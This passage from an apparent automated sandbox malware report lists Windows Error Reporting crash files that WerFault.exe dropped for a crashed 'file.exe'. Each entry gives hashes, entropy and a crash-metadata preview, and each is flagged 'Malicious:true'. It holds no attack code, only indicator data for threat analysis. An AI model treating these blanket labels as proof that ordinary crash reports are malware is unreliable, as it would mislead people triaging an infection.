a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_2045758c-5d66-4c80-a597-8752893b39f1\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8894264832448529
                  Encrypted:false
                  SSDEEP:192:nuV8av+PZJ056rL03jJwwZrHzuiFbZ24IO8ThBj:uVd+Bq56rgjxzuiFbY4IO8L
                  MD5:99AB75C4A3FB3448C99860969251658C
                  SHA1:7FE99A3E4D97A9D6F85D63B023161A090FEF37C9
                  SHA-256:B548A90913A73EC23E31935ECEC494F04C1DC75D51DFF5A4D94FA16FE4404188
                  SHA-512:A0163688EFD19C2D3692A1D1BC3DD8F114923B313E3E8B3F44A54CF2E89ACE2E0CE715EB9583665469CBEEA3B685985DF309358F9CBE7AEAA2E2B54A9EA2EEB4
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.2.1.7.7.2.0.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.5.7.5.8.c.-.5.d.6.6.-.4.c.8.0.-.a.5.9.7.-.8.7.5.2.8.9.3.b.3.9.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.2.3.4.6.d.4.-.2.8.1.1.-.4.2.e.9.-.a.2.1.e.-.4.5.f.2.2.d.d.7.4.8.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_30e4333a-d1e7-48c2-a62d-d257ad7d06d1\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.021294366924904
                  Encrypted:false
                  SSDEEP:192:yuV8avRPZJ056rL03jJwwZrtKd2zuiFbZ24IO8ThB:jVdRBq56rgjrzuiFbY4IO8L
                  MD5:696794BB6E4B072F7550367996D6D9A0
                  SHA1:DC5C913E850B7AEFFA4871B508BF9F645A265334
                  SHA-256:34FE5DE68E8E69BF6668D860C8DBC8E9E963CAC08819E37E6250698756B097DB
                  SHA-512:F7C5356903AD895FBA312162CB46E982CF2695FFA3231F41D5B4C6906ED293DEBB5376E83C2A129B64B3EBF7A17F497757C858EEF21ECD5909DDD2BB81052BC1
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.7.4.0.7.3.0.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.e.4.3.3.3.a.-.d.1.e.7.-.4.8.c.2.-.a.6.2.d.-.d.2.5.7.a.d.7.d.0.6.d.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.f.a.6.6.6.4.-.f.a.7.1.-.4.8.7.d.-.9.a.8.4.-.8.4.1.d.f.e.b.8.d.9.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_39b6735b-7329-4f4a-af31-65b9e8b4b0d8\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0057172950135076
                  Encrypted:false
                  SSDEEP:192:wAquV8avBPZJ056rL03jJwwZrtKdUzuiFbZ24IO8ThB:BVdBBq56rgjhzuiFbY4IO8L
                  MD5:855734E9072FE4ED0DD13A2FB18ABC67
                  SHA1:520931D8999B0DD131D46EA0B0CC8B2CF17434CF
                  SHA-256:ADF19B47FFFF93D594DABC8D0C2975F702C213D7628BFE6FEC2701B0EFC026A2
                  SHA-512:5C164C3990336CF3DCA47271FCC659FFBB27276EB9E41C4D6E72E851D500885E832BF9F74030C820FC0575306B99715BF29709D9D74C1AEBBB8B716087B0061A
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.6.5.5.8.6.0.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.b.6.7.3.5.b.-.7.3.2.9.-.4.f.4.a.-.a.f.3.1.-.6.5.b.9.e.8.b.4.b.0.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.e.4.a.2.2.b.-.d.2.2.c.-.4.0.c.d.-.a.f.c.2.-.5.d.f.c.e.9.b.6.c.9.3.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_74aaabdb-7185-4386-86c6-7986510b8f4c\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9834886758114009
                  Encrypted:false
                  SSDEEP:192:ztuV8av5PZJ056rL03jJwwZrtKdzzuiFbZ24IO8ThB:zoVd5Bq56rgjOzuiFbY4IO8L
                  MD5:3DBB32F014D92352F4BD3D263CC8C91D
                  SHA1:BEBA715C90525B8B20697FC9C932D00B1A8CF155
                  SHA-256:CA2F4F25298767661C8213C3EFEFBDC409D3A926912E2E08E0F1E9D75710CA19
                  SHA-512:631B42CED84351B9A2CC37A2EB559A4FBE05142354F5C26A2DE1DFFF17B6F55E9988900869FAC50FA33EEC713B69918B7CD04DD27D862E23E8501BB5BFF13D54
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.5.4.8.7.7.4.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.a.a.a.b.d.b.-.7.1.8.5.-.4.3.8.6.-.8.6.c.6.-.7.9.8.6.5.1.0.b.8.f.4.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.6.f.7.f.0.2.-.2.a.0.9.-.4.2.5.1.-.9.2.8.1.-.f.9.7.3.0.6.4.1.7.7.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_96ff7f74-b663-42e5-bc4f-6f4140ff3be6\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8892987407237314
                  Encrypted:false
                  SSDEEP:192:fuV8avkPZJ056rL03jJwwZrHzuiFbZ24IO8ThB:mVdkBq56rgjxzuiFbY4IO8L
                  MD5:AEF737DF2637483D8F95E0D87F338829
                  SHA1:13F0137B1B6430B092D4C1631574AE0491B46FA1
                  SHA-256:3E4B9D8A35649053CE8D4C4B4291D1FDF6EC638B062C8C3D7C658887C128209C
                  SHA-512:CFEB1D04AAD4B3F677987D32609503839F61701376EEF09DB4F00A3DF9FC06D7669E9BBF5012C67887F5FACB0EA7F62B4226A54CF1AACCDDA2C88541EAC7DB4D
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.1.5.4.2.3.1.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.f.f.7.f.7.4.-.b.6.6.3.-.4.2.e.5.-.b.c.4.f.-.6.f.4.1.4.0.f.f.3.b.e.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.f.e.b.f.d.a.-.c.7.1.f.-.4.8.e.7.-.b.1.8.7.-.5.f.5.f.6.b.f.a.a.6.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_b4555442-aa9f-4d2b-b89c-761a4725da9e\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9830113315369741
                  Encrypted:false
                  SSDEEP:192:4uV8av1PZJ056rL03jJwwZrtKdzzuiFbZ24IO8ThB:tVd1Bq56rgjOzuiFbY4IO8L
                  MD5:892DB0D2433B70FAAEC79AD7C3FB6038
                  SHA1:5374EE8F9BD965C172AD3CE271ABC3710ECAB616
                  SHA-256:B7867DA7893CF3C4D31EA6F3C4F305AD0B5009076977B3B6ABC9F194CB5C466C
                  SHA-512:1D7EA30ABF584A23E000AC2F899A6B7F38C9716D668F5F8B85A3CBA65019D3E948972A07DABA82433DDA736ECEAE1065E4F1630087FC0270B50880F7166AEEE0
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.4.6.8.7.0.0.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.5.5.5.4.4.2.-.a.a.9.f.-.4.d.2.b.-.b.8.9.c.-.7.6.1.a.4.7.2.5.d.a.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.3.a.5.6.8.6.-.8.d.d.9.-.4.0.e.4.-.b.b.b.b.-.5.7.8.f.a.0.b.b.b.2.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_c99405c2-2c0a-46a8-b847-4cefe23c654b\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8308988040439717
                  Encrypted:false
                  SSDEEP:192:pJuV8avrPZJ056rL03jJZzuiFbZ24IO8ThB:uVdrBq56rgjHzuiFbY4IO8L
                  MD5:2CB9A290E7E2402FDE7B62266FC52EAA
                  SHA1:A0BEFAC1C4199940232F0B842F0FF0617659F7A9
                  SHA-256:B3BD739A232B67C93D0B7CBAC8C3BF5C9C211A80F04A02045B4BA155FC4F0806
                  SHA-512:7FA51D297DD31A89303E274EF935CF9245B1D2DAAD239EC11D374BADB2B0A5036647D548E5F8533E2E237C7250599C18EADC526E04D54943BD476B66AD9BE210
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.0.0.8.3.0.7.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.4.0.5.c.2.-.2.c.0.a.-.4.6.a.8.-.b.8.4.7.-.4.c.e.f.e.2.3.c.6.5.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.2.6.6.6.d.1.-.a.e.f.0.-.4.1.4.9.-.a.f.c.5.-.f.2.8.4.a.8.a.f.a.4.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_d5ab6566-9af1-4f9b-8814-749ec04e57db\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8644095168674399
                  Encrypted:false
                  SSDEEP:192:IuV8avyPZJ056rL03jJwhzuiFbZ24IO8ThB:9VdyBq56rgjgzuiFbY4IO8L
                  MD5:E860B67B6C5C244F4FB3DEC26065BD4C
                  SHA1:6EF9BF0527F779C63ECC86AF8E27A6994470AD0D
                  SHA-256:962538CB9A354525839A66BD9B6202CC529A6EE46779E0FFDD64A6FDBC3612A4
                  SHA-512:C3466BFB0A8006E51FCC300C7659FAEC92ABF20EDC79CEF0CC97DA562442BA7D37300493AC7956ABD5EB4485FD7B8469111AC818E55BC6A0170F74166A9276AC
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.0.7.3.3.1.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.a.b.6.5.6.6.-.9.a.f.1.-.4.f.9.b.-.8.8.1.4.-.7.4.9.e.c.0.4.e.5.7.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.9.9.0.f.5.8.-.f.5.f.8.-.4.f.1.2.-.8.2.c.7.-.1.8.0.e.b.4.7.1.7.8.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_ed89d5e8-26da-4809-801d-4ee29beb7f85\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8957114504865719
                  Encrypted:false
                  SSDEEP:192:iuV8avvPZJ056rL03jJwwZrtdzuiFbZ24IO8ThB:TVdvBq56rgj5zuiFbY4IO8L
                  MD5:368BC7FA201B5128379CF2409A7D2D9D
                  SHA1:442AD2EB9F61AEB6B21BF2C787715A8C5DD3F8D2
                  SHA-256:7370F86413797C8389C25B04C01831BF8A4332C18A4A1F929A4BCFAE5D94A353
                  SHA-512:D3796A025366CB8FF4E68F0B797CDD0787312448FC35B61D57A88B4343368648EED8D82D93E91C83B85DE064F16F5E1DFA151F14ABBACA27CC6FF4EB38525BD9
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.2.9.0.2.1.8.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.8.9.d.5.e.8.-.2.6.d.a.-.4.8.0.9.-.8.0.1.d.-.4.e.e.2.9.b.e.b.7.f.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.d.b.b.1.d.f.-.6.0.f.3.-.4.2.2.4.-.b.b.7.0.-.a.4.0.a.6.6.4.d.1.6.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_28d320a303ac854afcaf7e92e2fd947b633_8c7b1063_fd78cc28-4d3c-44ba-8875-3d5569f02ffd\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8961108468150091
                  Encrypted:false
                  SSDEEP:192:YzuV8avcPZJ056rL03jJwwZrtdzuiFbZ24IO8ThB:YSVdcBq56rgj5zuiFbY4IO8L
                  MD5:F6646153C106BBD42FA439CD9EB30E3E
                  SHA1:E99F792A7E7C2F3B2F381D5B5EBEEBEE557FC085
                  SHA-256:30A3835053483BC04B8E289E08CF20B1B0AB63722CC2D0FFA3EA31FB5E221899
                  SHA-512:FB524EB0851BC6A31AFD1D851C163AA92EE384714BB120F2BB50420D48EC819C1F3AF5376AD82D0CD41EA5922D936FE90491F4FD6EEA6FD5386A0D2E1F621A00
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.3.7.0.4.8.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.7.8.c.c.2.8.-.4.d.3.c.-.4.4.b.a.-.8.8.7.5.-.3.d.5.5.6.9.f.0.2.f.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.7.5.6.2.e.5.-.1.d.4.1.-.4.b.7.7.-.9.5.a.8.-.1.8.d.a.9.d.9.5.d.d.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_ec492d5228b2a61569c7c0d248ab6229ba8fd643_8c7b1063_9f6cbff3-90e2-4702-ab6d-8d6407a8accd\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.1016310975983161
                  Encrypted:false
